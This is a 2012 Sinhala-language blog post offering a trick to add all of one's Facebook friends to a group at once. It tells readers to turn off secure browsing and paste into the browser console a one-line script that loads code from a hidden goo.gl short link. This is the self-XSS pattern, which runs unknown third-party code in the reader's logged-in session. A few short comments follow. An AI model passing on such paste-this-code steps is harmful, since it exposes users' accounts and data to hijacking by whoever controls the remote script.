Saturday, September 22, 2012
Facebook group එකට යාළුවෝ සේරම එකපාරින් add කරමුද?
ෆේස් බුක් ගෘප් දේ වෙන කොට සෑහෙන්න ජනප්‍රිය මාධ්‍යක් වෙලා ඉවරයි.ෆේස්බුක් ගෘප් එකක වටිනාකම රඳා පවතින ප්‍රධානම දේ තමා මෙම්බර්ස්ලා ගාන.කොහොමද තත්පර ගානකින් තමන්ගේ යාළුවෝ සේරම තමන් කැමති ගෘප් එකට ඇඩ් කරන්න පුළුවන් උනොත්.කරන්නේ මෙහෙමයි
මෙතනින් ෆේස් බුක් ට ලොග් වෙන්න
Account setting > Security > Secure browsing disable කරගන්න
මෙම්බර්ස්ලා ඇඩ් කරගන්න ඕනේ ගෘප් එකට යන්න
Firefox වලදී Ctrl +shift+K එකපාර ක්ලික් කරන්න chrome වල f12 ඔබන්න
යටින් එන වින්ඩෝ එකේ “console‘‘ select කරන්න
පහතින් දීලා තියෙන කෝඩ් එක ආපු වින්ඩෝ එකේ යටින්ම code add කරන්න තියෙන තැන පේස්ට් කරන්න
document.body.appendChild(document.createElement('script')).src='http://goo.gl/SZ4Ax';
අවසානෙට enter ගහන්න
ටික වෙලාවකින් තමන්ගේ යාලුවෝ සේරම ගෘප් එකට ඇඩ් වෙනවා බලාගන්න පුළුවන්
ගැටළුවක් තියේ නම් කමෙන්ට් එකකින් අහන්න.අපේ ෆේස් බුක් පේජ් එකට ලයික් එකක් දාලා යන්න ෆලෝ කරන්න අමතක කරන්න එපා.

Subscribe to:
Post Comments (Atom)
patta
ReplyDeletehttp://softzonelk.blogspot.com/2013/04/facebook-group-2013-new-java-script-100.html
ReplyDeletewada naaaaaaaaaaaaa
ReplyDeletec4a81u6l79 u5z38g5x74 i1l80j2w93 t0j39w5o09 r4k06j5l35 i5l53w4o69
ReplyDelete